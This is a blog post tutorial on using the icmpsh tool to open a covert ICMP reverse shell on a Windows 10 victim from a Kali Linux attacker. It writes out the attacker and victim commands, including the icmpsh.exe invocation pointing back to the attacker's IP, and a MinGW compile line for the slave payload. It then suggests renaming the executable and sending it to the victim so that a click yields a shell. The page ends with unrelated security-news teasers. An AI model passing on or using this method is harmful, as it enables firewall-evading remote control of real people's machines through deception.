Friday, March 29, 2024

ICMP Shell- Secret Command and Control Channel to Control Victims Machine Using Ping

Corporate firewalls can block reverse and bind TCP connections. However, corporate firewalls are behind internal networks. So we can use PING as a great convert channel to get victim shell access using ICMP Shell.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

Attacker Machine:-

  • Download the ICMP SHELL tool Here
  • execute command  ./run.sh shell script with 777 Permissions ( read, write, execute)
  • The output of the shell script command will give a piece of code icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.

Victim Machine:-

  • Upload “icmpsh.exe” on the victim machine.
  • Run CMD and  Execute “icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128” as a listener.
  • Here Listener script will be icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.
  • Execute this with CMD  & No admin privileges are needed.

Also Read :  Operating Systems can be detected using Ping Command

Back to Attacker Machine:-

  • Once the Listener is executed on my Windows 10 victim machine, Here we got a shell with ICMP.
  • So we can start our command and control of victim’s pc.
  • So only, ICMP requests/response traffic only sent via the attacker’s machine to the victim’s machine.

Victims Click & Shell Access:-

  • If you want to compromise victim directly by clicking, you can download the c code here 
  • After downloading compile the c code directly with the known victim IP Install MinGW in Kali Linux and run the following command to compile the C file i686-w64-mingw32-gcc icmp-slave-complete.c -o icmp-slave-complete.exe
  • Now you can Rename icmp-slave-complete.exe and send it to the victim. SHELL SHELL SHELL !!!
Website

Latest articles

Beware Of Weaponized Air Force invitation PDF Targeting Indian Defense And Energy Sectors

EclecticIQ cybersecurity researchers have uncovered a cyberespionage operation dubbed "Operation FlightNight" targeting Indian government...

WarzoneRAT Returns Post FBI Seizure: Utilizing LNK & HTA File

The notorious WarzoneRAT malware has made a comeback, despite the FBI's recent efforts to...

Google Revealed Kernel Address Sanitizer To Harden Android Firmware And Beyond

Android devices are popular among hackers due to the platform’s extensive acceptance and open-source...

Compromised SaaS Supply Chain Apps: 97% of Organizations at Risk of Cyber Attacks

Businesses increasingly rely on Software as a Service (SaaS) applications to drive efficiency, innovation,...

IT and security Leaders Feel Ill-Equipped to Handle Emerging Threats: New Survey

A comprehensive survey conducted by Keeper Security, in partnership with TrendCandy Research, has shed...

How to Analyse .NET Malware? – Reverse Engineering Snake Keylogger

Utilizing sandbox analysis for behavioral, network, and process examination provides a foundation for reverse...

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles